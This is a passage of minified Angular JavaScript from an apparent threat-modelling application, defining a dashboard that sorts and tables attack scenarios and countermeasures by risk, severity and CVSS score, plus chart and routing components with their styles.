Rc){const i=this.dataService.Project.GetAttackScenarios(),n=this.dataService.Project.GetAttackScenariosApplicable(),r=this.dataService.Project.GetAttackScenariosNotApplicable(),c=(d,T)=>{var k,q,Y,te;const pe=(Fe,Ne)=>Fe>=0&&Ne>=0?Number(Fe)>Number(Ne)?-1:Number(Fe)<Number(Ne)?1:0:Fe?-1:1;let Re=0;if(d.ViewID!=T.ViewID){const Fe={CTX:0,UC:1,HW:2,DF:3},Ne=this.dataService.Project.GetView(d.ViewID),et=this.dataService.Project.GetView(T.ViewID);Re=Ne instanceof as&&et instanceof as?Fe[Ne.DiagramType]<Fe[et.DiagramType]?-1:Fe[Ne.DiagramType]==Fe[et.DiagramType]?0:1:Ne instanceof as?Fe[Ne.DiagramType]<3?-1:1:et instanceof as?Fe[et.DiagramType]<3?1:-1:Ne.ComponentTypeID==et.ComponentTypeID?0:Ne.ComponentTypeID==zr.Software?-1:1,0==Re&&(Re=Ne.Name.localeCompare(et.Name))}return 0==Re&&(Re=pe(d.Risk,T.Risk)),0==Re&&(Re=pe(d.Severity,T.Severity)),0==Re&&(Re=pe(d.ThreatState,T.ThreatState)),0==Re&&(null===(k=d.ScoreCVSS)||void 0===k?void 0:k.Score)&&(null===(q=T.ScoreCVSS)||void 0===q?void 0:q.Score)?Re=pe(d.ScoreCVSS,T.ScoreCVSS):0==Re&&(null===(Y=d.ScoreCVSS)||void 0===Y?void 0:Y.Score)?Re=-1:0==Re&&(null===(te=T.ScoreCVSS)||void 0===te?void 0:te.Score)&&(Re=1),0==Re&&d.Target&&T.Target&&(Re=d.Target.Name.localeCompare(T.Target.Name)),0==Re&&(Re=pe(T.Number,d.Number)),Re};n.sort((d,T)=>c(d,T));for(let d=0;d<n.length;d++)this.dataService.Project.MoveItemAttackScenario(i.indexOf(n[d]),d),n[d].Number=(d+1).toString();r.sort((d,T)=>c(d,T));for(let d=0;d<r.length;d++)this.dataService.Project.MoveItemAttackScenario(i.indexOf(r[d]),n.length+d),r[d].Number=(n.length+d+1).toString();this.AttackScenarios=this.dataService.Project.GetAttackScenariosApplicable().filter(d=>d.MappingState!=zn.Removed)}else if(e instanceof Jl){const i=this.dataService.Project.GetCountermeasures(),n=this.dataService.Project.GetCountermeasuresApplicable(),r=this.dataService.Project.GetCountermeasuresNotApplicable(),c=(d,T)=>{const k=(Y,te)=>Y>=0&&te>=0?Number(Y)>Number(te)?-1:Number(Y)<Number(te)?1:0:Y?-1:1;let q=0;if(d.ViewID!=T.ViewID){const Y={CTX:0,UC:1,HW:2,DF:3},te=this.dataService.Project.GetView(d.ViewID),pe=this.dataService.Project.GetView(T.ViewID);q=te instanceof as&&pe instanceof as?Y[te.DiagramType]<Y[pe.DiagramType]?-1:Y[te.DiagramType]==Y[pe.DiagramType]?0:1:te instanceof as?Y[te.DiagramType]<3?-1:1:pe instanceof as?Y[pe.DiagramType]<3?1:-1:te.ComponentTypeID==pe.ComponentTypeID?0:te.ComponentTypeID==zr.Software?-1:1,0==q&&(q=te.Name.localeCompare(pe.Name))}return 0==q&&(q=k(d.MitigationState,T.MitigationState)),0==q&&d.Targets&&T.Targets&&(q=d.Targets.map(Y=>Y.Name).join(", ").localeCompare(T.Targets.map(Y=>Y.Name).join(", "))),0==q&&d.MitigationProcess&&T.MitigationProcess&&(q=k(d.MitigationProcess.Number,T.MitigationProcess.Number)),0==q&&(q=k(T.Number,d.Number)),q};n.sort((d,T)=>c(d,T));for(let d=0;d<n.length;d++)this.dataService.Project.MoveItemCountermeasures(i.indexOf(n[d]),d),n[d].Number=(d+1).toString();r.sort((d,T)=>c(d,T));for(let d=0;d<r.length;d++)this.dataService.Project.MoveItemCountermeasures(i.indexOf(r[d]),d),r[d].Number=(n.length+d+1).toString();this.Countermeasures=this.dataService.Project.GetCountermeasuresApplicable().filter(d=>d.MappingState!=zn.Removed)}}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn),Ee(_r),Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["app-results-analysis"]],viewQuery:function(e,i){if(1&e&&(Mi(po,5),Mi(y1t,5),Mi(b1t,5),Mi(xc,5,mi)),2&e){let n;Vt(n=Bt())&&(i.matMenuTrigger=n.first),Vt(n=Bt())&&(i.sortThreats=n.first),Vt(n=Bt())&&(i.sortCountermeasures=n.first),Vt(n=Bt())&&(i.rows=n)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,Qc)},decls:212,vars:86,consts:[["direction","vertical","unit","percent",3,"gutterSize","restrictMove","dragEnd"],["id","diagramContainer",3,"size","order"],[2,"margin","10px"],["mat-button","",2,"vertical-align","middle","min-width","30px","padding","0px",3,"click"],["style","display: inline; margin-left: 5px;","mode","indeterminate",3,"diameter",4,"ngIf"],[2,"font-size","small","display","flex","position","relative","overflow","auto"],[3,"marginLeft",4,"ngFor","ngForOf"],[2,"display","flex"],["mat-button","",3,"click"],[3,"size","order"],["direction","horizontal","unit","percent",3,"gutterSize","restrictMove","dragEnd"],[2,"height","100%","display","grid","align-content","start"],[2,"margin-left","5px","margin-top","2px"],["matInput","",1,"filterInput",3,"spellcheck","placeholder","keyup"],[2,"overflow","auto"],["mat-table","","matSort","","matSortActive","number","matSortDirection","asc","matSortDisableClear","",2,"width","100%",3,"dataSource"],["threattable","matSort"],["matColumnDef","number"],["mat-header-cell","","mat-sort-header","",4,"matHeaderCellDef"],["mat-cell","",4,"matCellDef"],["matColumnDef","name"],["matColumnDef","elements"],["mat-cell","",3,"selected-cell",4,"matCellDef"],["matColumnDef","view"],["matColumnDef","severity"],["matColumnDef","risk"],["matColumnDef","status"],["matColumnDef","more"],["mat-header-cell","",4,"matHeaderCellDef"],["mat-header-row","","style","height: 30px;",4,"matHeaderRowDef","matHeaderRowDefSticky"],["mat-row","",3,"id","selected-entry","click","dblclick","contextmenu",4,"matRowDef","matRowDefColumns"],["class","mat-row",4,"matNoDataRow"],["countermeasuretable","matSort"],["matColumnDef","targets"],["matColumnDef","progress"],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["rightMenu","matMenu"],["matMenuContent",""],["mode","indeterminate",2,"display","inline","margin-left","5px",3,"diameter"],[2,"height","400px",3,"diagram"],["mat-header-cell","","mat-sort-header",""],["mat-cell",""],[2,"width","80px",3,"ngModel","ngModelChange","change"],[3,"value"],[3,"value",4,"ngFor","ngForOf"],[2,"width","80px","pointer-events","none",3,"ngModel","ngModelChange"],[2,"width","130px",3,"ngModel","ngModelChange","change"],["mat-header-cell",""],["matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-header-row","",2,"height","30px"],["mat-row","",3,"id","click","dblclick","contextmenu"],[1,"mat-row"],["colspan","9",1,"mat-cell",3,"contextmenu"],["class","disable","color","primary","style","width: 100px; margin-right: 3px;",3,"value",4,"ngIf"],["color","primary",1,"disable",2,"width","100px","margin-right","3px",3,"value"],["style","margin-left: 20px; margin-right: 20px;",4,"ngIf"],["mat-menu-item","",3,"disabled","click"],[2,"margin-left","20px","margin-right","20px"]],template:function(e,i){if(1&e&&(m(0,"as-split",0),he("dragEnd",function(r){return i.OnSplitSizeChange(r,1)}),s(1,"\n  "),m(2,"as-split-area",1),s(3,"\n    "),m(4,"div",2),s(5,"\n      "),m(6,"h2"),s(7,"\n        "),m(8,"button",3),he("click",function(){return i.dialog.OpenModelInfoDialog()}),s(9,"\n          "),m(10,"mat-icon"),s(11,"source"),u(),s(12,"\n        "),u(),s(13),ne(14,M1t,1,1,"mat-progress-spinner",4),s(15,"\n      "),u(),s(16,"\n      "),m(17,"div",5),s(18,"\n        "),ne(19,v1t,4,3,"div",6),s(20,"\n        "),m(21,"div",7),s(22,"\n          "),m(23,"button",8),he("click",function(){return i.OpenTagCharts()}),s(24,"\n            "),m(25,"mat-icon"),s(26,"add_circle"),u(),s(27,"\n          "),u(),s(28,"\n        "),u(),s(29,"\n      "),u(),s(30,"\n    "),u(),s(31,"\n  "),u(),s(32,"\n  "),m(33,"as-split-area",9),s(34,"\n    "),m(35,"as-split",10),he("dragEnd",function(r){return i.OnSplitSizeChange(r,2)}),s(36,"\n      "),m(37,"as-split-area",9),s(38,"\n        "),m(39,"div",11),s(40,"\n          "),m(41,"div"),s(42,"\n            "),m(43,"span",12),s(44),oe(45,"translate"),oe(46,"translate"),u(),s(47,"\n            "),m(48,"input",13),he("keyup",function(r){return i.ApplyThreatFilter(r)}),oe(49,"translate"),u(),s(50,"\n          "),u(),s(51,"\n          "),m(52,"div",14),s(53,"\n            "),m(54,"table",15,16),s(56,"\n              "),bt(57,17),s(58,"\n                "),ne(59,A1t,3,3,"th",18),s(60,"\n                "),ne(61,T1t,2,1,"td",19),s(62,"\n              "),Mt(),s(63,"\n              "),bt(64,20),s(65,"\n                "),ne(66,E1t,3,3,"th",18),s(67,"\n                "),ne(68,D1t,2,1,"td",19),s(69,"\n              "),Mt(),s(70,"\n              "),bt(71,21),s(72,"\n                "),ne(73,x1t,3,3,"th",18),s(74,"\n                "),ne(75,w1t,2,3,"td",22),s(76,"\n              "),Mt(),s(77,"\n              "),bt(78,23),s(79,"\n                "),ne(80,I1t,3,3,"th",18),s(81,"\n                "),ne(82,R1t,2,1,"td",19),s(83,"\n              "),Mt(),s(84,"\n              "),bt(85,24),s(86,"\n                "),ne(87,S1t,3,3,"th",18),s(88,"\n                "),ne(89,P1t,11,6,"td",19),s(90,"\n              "),Mt(),s(91,"\n              "),bt(92,25),s(93,"\n                "),ne(94,O1t,3,3,"th",18),s(95,"\n                "),ne(96,L1t,7,2,"td",19),s(97,"\n              "),Mt(),s(98,"\n              "),bt(99,26),s(100,"\n                "),ne(101,z1t,3,3,"th",18),s(102,"\n                "),ne(103,F1t,7,2,"td",19),s(104,"\n              "),Mt(),s(105,"\n              "),bt(106,27),s(107,"\n                "),ne(108,V1t,2,0,"th",28),s(109,"\n                "),ne(110,B1t,6,3,"td",19),s(111,"\n              "),Mt(),s(112,"\n          \n              "),ne(113,H1t,1,0,"tr",29),s(114,"\n              "),ne(115,U1t,2,3,"tr",30),s(116,"\n              "),ne(117,q1t,6,3,"tr",31),s(118,"\n            "),u(),s(119,"\n          "),u(),s(120,"\n        "),u(),s(121,"\n      "),u(),s(122,"\n      "),m(123,"as-split-area",9),s(124,"\n        "),m(125,"div",11),s(126,"\n          "),m(127,"div"),s(128,"\n            "),m(129,"span",12),s(130),oe(131,"translate"),oe(132,"translate"),u(),s(133,"\n            "),m(134,"input",13),he("keyup",function(r){return i.ApplyCountermeasureFilter(r)}),oe(135,"translate"),u(),s(136,"\n          "),u(),s(137,"\n          "),m(138,"div",14),s(139,"\n            "),m(140,"table",15,32),s(142,"\n              "),bt(143,17),s(144,"\n                "),ne(145,G1t,3,3,"th",18),s(146,"\n                "),ne(147,j1t,2,1,"td",19),s(148,"\n              "),Mt(),s(149,"\n              "),bt(150,20),s(151,"\n                "),ne(152,Q1t,3,3,"th",18),s(153,"\n                "),ne(154,$1t,2,1,"td",19),s(155,"\n              "),Mt(),s(156,"\n              "),bt(157,33),s(158,"\n                "),ne(159,K1t,3,3,"th",18),s(160,"\n                "),ne(161,X1t,2,3,"td",22),s(162,"\n              "),Mt(),s(163,"\n              "),bt(164,23),s(165,"\n                "),ne(166,Y1t,3,3,"th",18),s(167,"\n                "),ne(168,J1t,2,1,"td",19),s(169,"\n              "),Mt(),s(170,"\n              "),bt(171,34),s(172,"\n                "),ne(173,Z1t,3,3,"th",28),s(174,"\n                "),ne(175,t2t,4,1,"td",19),s(176,"\n              "),Mt(),s(177,"\n              "),bt(178,26),s(179,"\n                "),ne(180,i2t,3,3,"th",18),s(181,"\n                "),ne(182,n2t,7,2,"td",19),s(183,"\n              "),Mt(),s(184,"\n              "),bt(185,27),s(186,"\n                "),ne(187,o2t,2,0,"th",28),s(188,"\n                "),ne(189,r2t,6,3,"td",19),s(190,"\n              "),Mt(),s(191,"\n          \n              "),ne(192,s2t,1,0,"tr",29),s(193,"\n              "),ne(194,c2t,2,3,"tr",30),s(195,"\n              "),ne(196,l2t,6,3,"tr",31),s(197,"\n            "),u(),s(198,"\n          "),u(),s(199,"\n        "),u(),s(200,"\n      "),u(),s(201,"\n      "),it(202,"div",35),s(203," \n      "),m(204,"mat-menu",null,36),s(206," \n        "),ne(207,u2t,35,14,"ng-template",37),s(208," \n      "),u(),s(209," \n    "),u(),s(210,"\n  "),u(),s(211,"\n"),u()),2&e){const n=Ti(205);V("gutterSize",3)("restrictMove",!0),C(2),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("size",i.GetSplitSize(1,0,50))("order",1),C(11),ct("\n        ",null==i.dataService.Project?null:i.dataService.Project.Name,"\n        "),C(1),V("ngIf",i.isUpdatingDiagrams),C(5),V("ngForOf",i.diagrams),C(14),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("size",i.GetSplitSize(1,1,"*"))("order",2),C(2),V("gutterSize",3)("restrictMove",!0),C(2),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("size",i.GetSplitSize(2,0,50))("order",1),C(7),J_("",re(45,74,"pages.dashboard.ThreatOverview"),": ",i.AttackScenarios.length," ",re(46,76,"general.AttackScenarios"),""),C(4),ri("color",i.theme.IsDarkMode?"white":"black"),Ct("bg-color-light2",!i.theme.IsDarkMode)("bg-color-dark2",i.theme.IsDarkMode),at("placeholder",re(49,78,"pages.modeling.filter")),V("spellcheck",i.dataService.HasSpellCheck),C(6),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("dataSource",i.dataSourceThreats),C(59),V("matHeaderRowDef",i.displayedThreatColumns)("matHeaderRowDefSticky",!0),C(2),V("matRowDefColumns",i.displayedThreatColumns),C(8),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("size",i.GetSplitSize(2,1,"*"))("order",2),C(7),J_("",re(131,80,"pages.dashboard.CountermeasureOverview"),": ",i.Countermeasures.length," ",re(132,82,"general.Countermeasures"),""),C(4),ri("color",i.theme.IsDarkMode?"white":"black"),Ct("bg-color-light2",!i.theme.IsDarkMode)("bg-color-dark2",i.theme.IsDarkMode),at("placeholder",re(135,84,"pages.modeling.filter")),V("spellcheck",i.dataService.HasSpellCheck),C(6),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("dataSource",i.dataSourceCountermeasures),C(52),V("matHeaderRowDef",i.displayedCountermeasureColumns)("matHeaderRowDefSticky",!0),C(2),V("matRowDefColumns",i.displayedCountermeasureColumns),C(8),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),V("matMenuTriggerFor",n)}},styles:[".primary-color[_ngcontent-%COMP%], .selected-entry[_ngcontent-%COMP%]   td[_ngcontent-%COMP%], .selected-cell[_ngcontent-%COMP%], .selected-item[_ngcontent-%COMP%]   td[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.primary-color[_ngcontent-%COMP%], .selected-entry[_ngcontent-%COMP%]   td[_ngcontent-%COMP%], .selected-cell[_ngcontent-%COMP%], .selected-item[_ngcontent-%COMP%]   td[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}tr[_ngcontent-%COMP%]{height:30px!important}th.mat-header-cell[_ngcontent-%COMP%]:first-of-type, td.mat-cell[_ngcontent-%COMP%]:first-of-type, td.mat-footer-cell[_ngcontent-%COMP%]:first-of-type{padding-left:5px!important}th.mat-header-cell[_ngcontent-%COMP%]:last-of-type, td.mat-cell[_ngcontent-%COMP%]:last-of-type, td.mat-footer-cell[_ngcontent-%COMP%]:last-of-type{padding-right:5px!important}.removed-item[_ngcontent-%COMP%]{opacity:.3}.tools[_ngcontent-%COMP%]{display:block;float:left;height:27px;width:calc(100% - 20px);font-size:12px}.toolBtn[_ngcontent-%COMP%]{width:30px;min-width:30px;padding:0;line-height:25px;margin-left:5px}.toolBtn-Selected[_ngcontent-%COMP%]{background-color:#ffffff26}.filterInput[_ngcontent-%COMP%]{margin-left:5px;width:200px;height:25px}th[_ngcontent-%COMP%], td[_ngcontent-%COMP%]{font-size:small}.filterInput[_ngcontent-%COMP%]{float:right;margin-right:5px;margin-top:2px;width:200px;height:25px}.disable[_ngcontent-%COMP%]{pointer-events:none}"]}),t})();const h2t=[{path:"dashboard",component:(()=>{class t{constructor(e,i,n,r){this.theme=e,this.dataService=i,this.translate=n,this.router=r,this.dataService.Project||this.router.navigate(["/home"],{queryParams:{origin:"dashboard"}})}ngOnInit(){}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Sn),Ee(Oo))},t.\u0275cmp=Wt({type:t,selectors:[["app-dashboard"]],decls:18,vars:4,consts:[[1,"website-container"],[1,"drawer-container"],["mode","side","opened","",2,"border-right-width","0px"],["selectedRoute","/dashboard",2,"width","100%","height","100%"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"mat-drawer-container",1),s(3,"\n    "),m(4,"mat-drawer",2),s(5,"\n      "),it(6,"app-side-nav",3),s(7,"\n    "),u(),s(8,"\n\n    "),m(9,"mat-drawer-content"),s(10,"\n      "),it(11,"app-results-analysis"),s(12,"\n    "),u(),s(13,"\n  "),u(),s(14,"\n  "),it(15,"app-status-bar"),s(16,"\n"),u(),s(17,"\n")),2&e&&(C(9),Ct("splitter-light2",!i.theme.IsDarkMode)("splitter-dark2",i.theme.IsDarkMode))},dependencies:[_u,gu,Od,_f,gf,yf],styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}"]}),t})()}];let f2t=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,bs.forChild(h2t),bs]}),t})();function p2t(t,a){if(1&t&&(bt(0),s(1,"\n  "),m(2,"div"),s(3,"\n    "),m(4,"h3",1),s(5),u(),s(6,"\n    \n    "),m(7,"ngx-charts-bar-vertical-stacked",2),s(8,"\n    "),u(),s(9,"\n  "),u(),s(10,"\n"),Mt()),2&t){const e=B();C(5),ke(e.diagram.xAxisLabel),C(2),Ct("chartDark",e.theme.IsDarkMode),V("scheme",e.diagram.scheme)("view",e.diagram.view)("results",e.diagram.results)("xAxisLabel",e.diagram.xAxisLabel)("yAxisLabel",e.diagram.yAxisLabel)("yAxisTickFormatting",e.CutDigits)("xAxis",!0)("yAxis",!0)("showXAxisLabel",!1)("showYAxisLabel",!0)("animations",!0)("legend",!0)("legendPosition",e.legendPosition)("barPadding",3)}}let SZ=(()=>{class t{constructor(e,i){this.theme=e,this.elRef=i,this.legendPosition=Su.Below}ngOnInit(){}CutDigits(e){return e.toFixed(0)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["app-results-chart"]],inputs:{diagram:"diagram"},decls:1,vars:1,consts:[[4,"ngIf"],[2,"text-align","center","margin-top","0px","margin-bottom","5px"],["legendTitle","",3,"scheme","view","results","xAxisLabel","yAxisLabel","yAxisTickFormatting","xAxis","yAxis","showXAxisLabel","showYAxisLabel","animations","legend","legendPosition","barPadding"]],template:function(e,i){1&e&&ne(0,p2t,11,17,"ng-container",0),2&e&&V("ngIf",i.diagram)},dependencies:[Ri,S6e],styles:[".primary-color[_ngcontent-%COMP%], .chartDark[_ngcontent-%COMP%]     .chart-legend .legend-label .active .legend-label-text{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, 